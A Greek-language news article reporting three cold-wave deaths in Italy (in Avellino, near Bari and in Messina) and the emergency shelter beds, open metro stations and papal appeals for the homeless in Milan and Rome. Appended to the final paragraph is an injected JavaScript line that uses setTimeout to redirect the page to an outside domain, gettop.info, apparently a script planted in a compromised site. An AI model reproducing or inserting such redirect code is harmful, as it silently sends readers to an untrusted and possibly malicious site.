Τραγωδία στην Ιταλία: Τρεις νεκροί από το ψύχος

0
6

 

Τρεις άνθρωποι έχασαν την ζωή τους εξαιτίας του κύμα ψύχους που πλήττει την Ιταλία.

Στην πόλη Αβελίνο, κοντά στην Νάπολη, ένας άστεγος άνδρας σαράντα τεσσάρων ετών βρέθηκε νεκρός μέσα σε εγκαταλειμμένο εμπορικό κέντρο. Σε χωριό έξω από το Μπάρι της Απουλίας, μια γυναίκα σαράντα εννέα ετών έχασε την ζωή της εξαιτίας της ολισθηρότητας του δρόμου.

Γλίστρησε σε παγωμένο πεζοδρόμιο, χτυπώντας το κεφάλι, και όταν το πρώτων βοηθειών την μετέφερε στο νοσοκομείο, η καρδιά της είχε ήδη σταματήσει να χτυπά. Στην Μεσσίνα της Σικελίας, το μεγάλο κύμα ψύχους προκάλεσε τον θάνατο ενός άστεγου άνδρα σαράντα έξι ετών, με καταγωγή από την Ρουμανία.

Στο Μιλάνο πολλοί άστεγοι περνούν την νύχτα μέσα στο αεροδρόμιο Μαλπένσα. Τις ημέρες αυτές, ο δήμος και οι εθελοντικές οργανώσεις της ιταλικής συμπρωτεύουσας έχουν δημιουργήσει χώρους φιλοξενίας με δυο χιλιάδες κλίνες για άλλους τόσους ανθρώπους που δεν διαθέτουν μόνιμο χώρο διαμονής.

Στην Ρώμη, τα επιπλέον κρεβάτια για τους άστεγους είναι εξακόσια, ενώ παραμένουν ανοικτές, όλη την νύχτα, και πολλές στάσεις του μετρό. Παρά τα έκτακτα μέτρα ασφαλείας, επίσης, πολλοί άστεγοι συνεχίζουν να κοιμούνται στην πλατεία του Αγίου Πέτρου. Ο πάπας Φραγκίσκος επαναλαμβάνει διαρκώς ότι η πραγματική αλληλεγγύη και ευσπλαχνία των χριστιανών, πρέπει να μετατρέπεται σε συγκεκριμένες πράξεις, αρχίζοντας, για παράδειγμα, από τους «κλοσάρ» της Αιώνιας Πόλης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here